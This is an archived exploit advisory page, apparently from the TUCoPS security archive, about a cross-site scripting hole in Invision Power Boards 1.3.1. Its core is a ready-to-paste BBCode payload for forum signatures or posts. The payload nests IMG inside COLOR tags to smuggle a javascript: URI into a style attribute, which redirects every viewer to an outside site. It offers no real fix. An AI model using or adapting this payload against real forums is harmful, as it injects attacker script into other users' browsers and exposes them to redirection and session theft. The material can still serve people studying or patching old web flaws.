TUCoPS :: Web BBS :: Frequently Exploited :: hack7771.htm

Invision Power Boards 1.3.1 FINAL XSS Exploit
Invision Power Boards 1.3.1 FINAL XSS Exploit 



Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("ja vascript:document.location.replace('http://www.hackthissite.org');") [/color]
Fix:
I'm not good at regexes :)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH